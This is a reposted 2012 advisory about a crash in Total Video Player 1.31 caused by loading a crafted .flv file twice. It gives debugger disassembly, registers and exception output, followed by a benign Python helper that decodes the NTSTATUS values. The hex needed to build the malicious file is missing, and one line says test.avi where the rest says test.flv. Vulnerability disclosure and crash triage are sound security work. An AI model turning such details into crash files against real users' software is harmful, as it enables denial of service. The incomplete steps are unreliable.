Total Video Player V1.31 [.flv] vuln after exception handling
Source: fb.me/Ayrbyte  Author: Ayrbyte  Published: 2012-06-12
/*##############################################################################################
title       : Total Video Player V1.31 [.flv] vuln after exception handling
author      : Ayrbyte
link        : http://www.softpedia.com/get/Multimedia/Video/Video-Players/Total-Video-Player.shtml
tested on   : windows 7
fb          : fb.me/Ayrbyte
greetz to   : thanks to Zax Oktav, Andy Oioi, Rizaldy Ahmad, Rezza Aulia Pratama, Cloud Sky,
              Zet Dot Exe and all b-compi family ^_^
              We are B-Compi... We are Hacker... We Are Proud...!
################################################################################################
The application crashes after test.flv is loaded twice.
On the first load of test.flv, the error message "Cannot init video render" appears,
followed by the TVP message "The file can not be played". When test.flv is loaded once more,
the program crashes.

[disassembly]
ntdll!KiRaiseUserExceptionDispatcher:
77016498 55               push    ebp
77016499 8bec             mov     ebp,esp
7701649b 83ec50           sub     esp,50h
7701649e 8944240c         mov     dword ptr [esp+0Ch],eax
770164a2 64a118000000     mov     eax,dword ptr fs:[00000018h]
770164a8 8b80a4010000     mov     eax,dword ptr [eax+1A4h]
770164ae 890424           mov     dword ptr [esp],eax
770164b1 c744240400000000 mov     dword ptr [esp+4],0
770164b9 c744240800000000 mov     dword ptr [esp+8],0
770164c1 c744241000000000 mov     dword ptr [esp+10h],0
770164c9 54               push    esp
770164ca e839000000       call    ntdll!RtlRaiseException (77016508)
770164cf 8b0424           mov     eax,dword ptr [esp]  ss:0023:0012c510=c0000008; <<--Access Violation
770164d2 8be5             mov     esp,ebp
770164d4 5d               pop     ebp
770164d5 c3               ret

[register]
eax=c0000008 ebx=00000000 ecx=0012c564 edx=77016498 esi=023408d0 edi=02340a40
eip=770164cf esp=0012c510 ebp=0012c560 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202

(ed8.548): Invalid handle - code c0000008 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
ntdll!KiRaiseUserExceptionDispatcher+0x37:
770164cf 8b0424          mov     eax,dword ptr [esp]  ss:0023:0012c510=c0000008 <<--
Access Violation. Unhandled exception in tvp.exe (NTDLL.DLL):0xC0000005:
################################################################################################

Making the file test.avi:
Open a hex editor, paste the hex below (without the quotes "") into it, then save as test.flv


comment : for those viewing this, sorry, it's manual for now because my compiler is broken ^_^
##############################################################################################*/
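
A triage helper for the debugger output quoted in the advisory, added here as an example and not part of the original advisory: it decodes the NTSTATUS value on the exception event line into its bit fields and collects the registers and the symbol where execution stopped. The function names and the embedded sample (copied from the lines above) are this example's own.

```python
import re

# Constructed sample: exception and register lines copied from the debugger
# output quoted in the advisory.
SAMPLE_LOG = """\
eax=c0000008 ebx=00000000 ecx=0012c564 edx=77016498 esi=023408d0 edi=02340a40
eip=770164cf esp=0012c510 ebp=0012c560 iopl=0         nv up ei pl nz na po nc
(ed8.548): Invalid handle - code c0000008 (first chance)
ntdll!KiRaiseUserExceptionDispatcher+0x37:
"""

# Two NTSTATUS values from ntstatus.h that appear in the advisory.
KNOWN_STATUS = {0xC0000005: "STATUS_ACCESS_VIOLATION",
                0xC0000008: "STATUS_INVALID_HANDLE"}
SEVERITY = ("SUCCESS", "INFORMATIONAL", "WARNING", "ERROR")

EVENT_RE = re.compile(r"\(([0-9a-f]+)\.([0-9a-f]+)\): (.+?) - code ([0-9a-f]{8}) "
                      r"\((first|!!! second) chance")
REG_RE = re.compile(r"\b(e[a-z]{2})=([0-9a-f]{8})\b")
SYM_RE = re.compile(r"^(\w+)!(\w+)\+0x([0-9a-f]+):", re.M)


def decode_ntstatus(value):
    """Split a 32-bit NTSTATUS into its documented bit fields."""
    return {"name": KNOWN_STATUS.get(value, "UNKNOWN"),
            "severity": SEVERITY[value >> 30],      # bits 31-30
            "customer": bool(value >> 29 & 1),      # bit 29
            "facility": value >> 16 & 0xFFF,        # bits 27-16
            "code": value & 0xFFFF}                 # bits 15-0


def triage(log):
    """Summarise the first exception event found in a WinDbg-style log."""
    event = EVENT_RE.search(log)
    if event is None:
        raise ValueError("no exception event line found")
    pid, tid, text, code, chance = event.groups()
    result = decode_ntstatus(int(code, 16))
    sym = SYM_RE.search(log)
    result.update(
        pid=int(pid, 16), tid=int(tid, 16), text=text,
        chance=chance.strip("! "),
        registers={r: int(v, 16) for r, v in REG_RE.findall(log)},
        location=(sym.group(1), sym.group(2), int(sym.group(3), 16)) if sym else None)
    return result


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```
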

 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved